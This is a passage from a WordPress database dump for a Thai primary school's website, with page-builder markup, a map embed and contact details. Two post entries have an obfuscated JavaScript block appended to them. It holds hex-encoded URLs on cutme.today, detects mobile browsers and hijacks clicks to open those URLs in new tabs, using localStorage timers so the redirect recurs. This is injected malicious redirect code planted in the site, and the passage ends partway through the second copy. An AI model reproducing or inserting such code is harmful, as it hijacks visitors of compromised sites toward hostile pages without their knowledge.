class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 10:30:23','2024-08-01 03:30:23','',14,'http://pakhaeng.ssk.in.th/?p=342',0,'revision','',0),
(343,1,'2024-08-01 10:31:41','2024-08-01 03:31:41','วันจันทร์ที่ 29 กรกฎาคม หยุดไหมครับ\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 